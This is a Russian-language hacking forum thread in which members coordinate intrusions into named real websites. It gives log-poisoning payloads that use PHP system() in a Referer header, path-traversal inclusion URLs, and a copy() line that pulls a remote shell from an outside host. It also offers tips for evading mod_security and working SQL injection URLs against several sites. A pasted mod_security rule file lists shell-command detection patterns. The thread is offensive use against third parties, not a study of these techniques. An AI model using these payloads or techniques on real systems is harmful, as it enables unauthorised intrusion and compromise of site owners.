Ты про Toolza от Pashela? Она на Perl'e написана. Perl - это интерпретируемый язык, т.е. его не надо компилировать. Скачивай ActivePerl и запускай. Или поищи в гугле "Как запускать Perl-скрипты"
Вывод /etc/passwd - это хорошо, но выполнение своего кода лучше. 1) Заливка шелла через соседей. Через реверс-DNS находим 35 сайтов, расположенных на том же сервере, что и libertarias.com. На одном из сайтов (ud-garithos.com) стоит phpBB 3.0.7 , в этой версии есть раскрытие путей, а шелл можно залить в картинке через аттач. К сожалению, версия оказалась пропатченная и путь узнать не удалось. 2) Внедрение кода в логи. На сайте хостера (http://wiki.dreamhost.com/Finding_Causes_of_Heavy_Usage) узнаем, что логи хранятся в ~/logs/yourdomain.com/http/ Для внедрения кода в error.log выполняем запрос: PHP: GET /qwertyuiop HTTP/1.0 Host: www.libertarias.com Referer: <? ТУТ_ЛЮБОЙ_КОД ?> В access.log: PHP: GET / HTTP/1.0 Host: www.libertarias.com Referer: <? ТУТ_ЛЮБОЙ_КОД ?> Примеры: PHP: GET /qwertyuiop HTTP/1.0 Host: www.libertarias.com Referer: <? system($_GET['qwe']) ?> Code: http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/error.log%00&qwe=ls PHP: GET / HTTP/1.0 Host: www.libertarias.com Referer: <? system($_GET['qwe']) ?> Code: http://www.libertarias.com/?op=../../../../home/libertarias/logs/libertarias.com/http/access.log%00&qwe=ls p.s.: не забывай про Mod Security Code: http://www.libertarias.com/?op=../../../../dh/apache2/template/etc/mod_sec2/gotroot/50_asl_rootkits.conf%00& PHP: #Body sigs SecRule REQUEST_HEADERS_NAMES "x_(?:key|file)\b" \ "capture,phase:2,t:none,t:lowercase,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Backdoor access',id:390146,severity:'2',logdata:'%{TX.0}'" #c99 rootshell SecRule REQUEST_URI "(?:\.php\?act=(chmod&f|cmd|ls|f&f)|cx529\.php|\.php\?(?:phpinfo|mtnf|p0k3r)|/shell[0-9]?\.php|/\.get\.php)" \ "capture,id:390146,rev:17,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Command shell attack: PHP exploit shell attempting to run command',logdata:'%{TX.0}'" #URI sigs SecRule REQUEST_URI "/(?:(?:cse|cmd)\.(?:c|dat|gif|jpe?g|png|sh|txt|bmp|dat|txt|js|tmp|php(?:3|4|5)?|asp)|(?:terminatorX-?exp|[a-z](?:cmd|command)[0-9]?)\.(?:gif|jpe?g|txt|bmp|php(?:3|4|5)?|png)\?|cmd(?:\.php(?:3|4|5)?|dat)|/(?:a|ijoo|oinc|s|sep|ipn|pro18|(php(?:3|4|5)?)?|shell|(?:o|0|p)wn(?:e|3)d|xpl|ssh2|too20|php(?:3|4|5)?backdoor|dblib|sfdg2)\.(?:c|dat|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|htm|html|tmp|php(?:3|4|5)?|asp)\?&(?:command|cmd)=|\.it/viewde|/(?:gif|jpe?g|ion|lala|shell|/ipn|php(?:3|4|5)?shell)\.(?:php?(?:3|4|5)?|tml)|tool[12][0-9]?\.(?:ph(?:p(?:3|4|5)?|tml)|js)\?|therules25?\.(d(ao)t|gif|jpe?g|bmp|txt|png|asp)\?|\.dump/(bash|httpd)\.(?:txt|php?(?:3|4|5)?|gif|jpe?g|dat|bmp|png|\;| )|suntzu\.php?(?:3|4|5)?\?cmd|proxysx\.(?:gif|jpe?g|bmp|txt|asp|png)\?|shell.txt|scan1\.0/scan/|(?:/bind|/juax|linuxdaybot)\.(gif|jpe?g|txt|bmp|png)|docLib/cmd\.asp)" \ "capture,id:390800,rev:3,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to run rootkit',logdata:'%{TX.0}'" #generic payload #if (isset($_GET['cmd'])) passthru(stripslashes($_GET['cmd'])); SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:<\? ?php (echo ?\"hi ?master|.*(system|passthru|shell_exec|exec) ?\()|error_reporting\(.*\) ?\; ?if ?\(isset ?\(.*\) ?\) (system|passthru|shell_exec|exec) ?\(|(stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\()" \ "capture,id:390801,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to insert rootkit code',logdata:'%{TX.0}'" SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:<\? ?php (echo ?\"hi ?master|.*(system|passthru|shell_exec|exec) ?\()|error_reporting\(.*\) ?\; ?if ?\(isset ?\(.*\) ?\) (system|passthru|shell_exec|exec) ?\(|(stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\()" \ "capture,t:hexDecode,id:390801,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to insert rootkit code',logdata:'%{TX.0}'" SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:<\? ?php (echo ?\"hi ?master|.*(system|passthru|shell_exec|exec) ?\()|error_reporting\(.*\) ?\; ?if ?\(isset ?\(.*\) ?\) (system|passthru|shell_exec|exec) ?\(|(stripslashes|passthru) ?\( ?\$_request\[\"|if \( ?get_magic_quotes_gpc\()" \ "capture,t:base64Decode,id:390801,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Generic Attempt to insert rootkit code',logdata:'%{TX.0}'" #Generic remote perl execution with .pl extension SecRule REQUEST_URI "(?:perl .*\.pl(\s|\t)*\;|\;(\s|\t)*perl .*\.pl|perl (?:xpl\.pl|kut|viewde|httpd\.txt)|\./xkernel\;|/kaiten\.c|/mampus\?&(?:cmd|command)|trojan\.htm|/(?:r57|c99|c100)\.(?:php|txt)|r57shell\.(?:php|txt))" \ "capture,id:390802,rev:3,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible Rootkit attack: Known Rootkit',logdata:'%{TX.0}'" #some broken attack program SecRule REQUEST_URI|ARGS|REQUEST_BODY "(?:_@@rndstr@@|netenberg |psybnc |fantastico_de_luxe |arta\.zip )" \ "capture,id:390803,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Known Wormsign',logdata:'%{TX.0}'" #wormsign sigs SecRule RESPONSE_BODY "(?:add (?:new emailbases to database|high prioritet emails))" \ "phase:4,t:none,t:lowercase,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible spamtool installed on system',id:'390150',severity:'2'" #Rapid Leech blocks SecRule RESPONSE_BODY "(?:<b>rapidleech checker script|rapidleech plugmod - auto download|<title>rapidleech|You are not allowed to leech from|alt=\"rapidleech plugmod|<center>.*<a href=http://www\.rapidleech\.com>rapidleech</a>|src=\"http://www\.rapidleech\.com/logo\.gif)" \ "phase:4,t:lowercase,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390900',rev:8,severity:'2'" SecRule RESPONSE_HEADERS:WWW-Authenticate "basic realm.*rapidleech" \ "capture,phase:3,ctl:auditLogParts=+E,auditlog,status:404,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Unauthorized Download Client - Rapidleech',id:'390903',rev:1,severity:'2',logdata:'%{TX.0}'" #WWW-Authenticate: Basic realm=\"RAPIDLEECH PLUGMOD SecRule ARGS:cmd "(?:ls -|find /|mysqldump |ifconfig |php |echo |perl |killall |kill |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |wget |lwp-(?:download|request|mirror|rget) |uname |cvs |svn |(?:s|r)(?:cp|sh) |net(?:stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |g?cc |cpp |g\+\+ |/s?bin/(?:xterm|id|bash|sh|echo|kill|chmod|ch?sh|python|perl|nasm|ping|mail|ssh|netstat|php|route))" \ "capture,id:390904,rev:4,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'" SecRule ARGS:ev "^print [0-9];" \ "capture,id:390905,rev:1,severity:2,msg:'Atomicorp.com - FREE UNSUPPORTED DELAYED FEED - WAF Rules: Possible PHP Shell Command Attempt',logdata:'%{TX.0}'" <LocationMatch homeCounter.php> SecRuleRemoveById 390144 SecRuleRemoveById 390145 </LocationMatch> <LocationMatch moderation.php> SecRuleRemoveById 390148 </LocationMatch> <LocationMatch /paadmin/file_manager.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /__utm.gif> SecRuleRemoveById 390144 </LocationMatch> <LocationMatch /administrator/index.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /ota/admin/file_manager.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /admin/shop_file_manager.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /admin/file_manager.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /modules/mod_oneononechat/chatfiles/*> SecRuleRemoveById 390147 </LocationMatch> <LocationMatch /fud/adm/admbrowse.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /wp-cron.php> SecRuleRemoveById 390147 </LocationMatch> <LocationMatch /admin/mods/easymod/easymod_install.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /e107_plugins/autogallery/autogallery.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /alfresco/scripts/onload.js> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /e107_plugins/autogallery/autogallery.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /assets/Files/who/> SecRuleRemoveById 390147 </LocationMatch> <LocationMatch /forum/viewtopic.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /setup/> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /administrator/index2.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /sales/soap.php> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /twg177/admin/> SecRuleRemoveById 390149 </LocationMatch> <LocationMatch /images/smilies/> SecRuleRemoveById 390148 </LocationMatch> <LocationMatch /admin/dogen_display.php> SecRuleRemoveById 390801 </LocationMatch> <LocationMatch /horde/themes/graphics/> SecRuleRemoveById 390148 </LocationMatch> <LocationMatch /whois/quick.php> SecRuleRemoveById 390145 </LocationMatch> <LocationMatch /ubbthreads.php> SecRuleRemoveById 390902 </LocationMatch>
2M_script Тчорт, как же я сам не догадался, посмотреть хостера - уже потерял надежду найти путь к логам. Но это все равно бесполезно, ибо проклятый Mod Security удачно зарежет все system|passthru|shell_exec|exec ?
А зачем нужны они, ведь зная пути можно через ф-цию copy() в PHP залить. Попробуй сначала в /tmp залить и проинклюдить его оттуда. <?php copy('http://tvoisait.com/shell.txt','/tmp/shell'); ?> ?op=../../../../../../../../tmp/shell А логи возможно найти брутом путей и в твоем случае это бы удалось.
2Tigger я ручками перебирал. 1. Кстати, что можете посоветовать для автоперебора? (с поддержкой прокси желательно) 2. Странно что в мод_секьюрити не запрещена ф-ия copy()? 3. Для инклуда логов есть только 1-а попытка (при обращении получаю: Parse error: syntax error, unexpected '[' in /home/libertarias/logs/libertarias.com/http.620816/access.log)?
1. Я использовал LIBrute от Voland'a, или же Toolza от Pashkela. 2. Ну а ты попробуй и узнаешь, хотя уже не узнешь.... Это обычная PHP ф-ция, вряд ли она запрещена на сервере. 3. После поста М_скрипта видать налетели и похерили логи, скорее всего забыв поставить ";" =\ С чего такое утверждение? Может ты знаешь информацию про данный сервер и поэтому так утверждаешь, но а вообще это бред. Везде по-разному. Порой логи с 2005 годов тянешь.
Значит кто-то уже испортил. Подожди до завтра, логи каждый день начинаются заново. p.s.: функция eval не запрещена.
Ясно, с чего вы взяли что логи хостер обнуляет каждый день? Хотя, очень хочется надеяться.. =) Судя по 50_asl_rootkits.conf eval действительно должно работать... А вообще, всем спасибо. Полезный топик.
в практике мод секюрити очень легко обходится, например вместо system который фильтруется, юзаем print(``), или если фильтруются команды линуха, например слово wget, или ls -al юзаем base64 энкод, да и вообще бывает обходится весь фильтр простым пост запросом
Ну а что такого удивительного? Скорее всего фильтр обычный проверяющий параметры. А что ты подставил? Кавычку? Попробуй самым обычным путем проверить на SQLi не юзаю кавычку. id=1+and+1=1 \ id=1+and+1=2
Как здесь обойти фильтрацию? http://figura.kaluga.com/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=63+union+select+1,2+--+
Какая БД тут, непонятно http://www.kashmirlive.com/picturegallery.php?albumId=46+union+select+1,2,3,4+--+
PostgreSQL 8.2.0 http://www.kashmirlive.com/picturegallery.php?albumId=46+and+1=0+union+select+null,version(),null,null+--+
Тоже Postgre: http://www.maultsbytalent.com/models-and-talent.php?group=Female&type=Print&id=270'+union+select+version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version(),version()+--+&location= вывести не удается!
Где ты там постгрейс увидел? это мюскл 5-ая ветка Code: http://www.maultsbytalent.com/models-and-talent.php?group=Female&type=Print&id=270'and(1=if(mid(version(),1,1)=5,1,0))--+
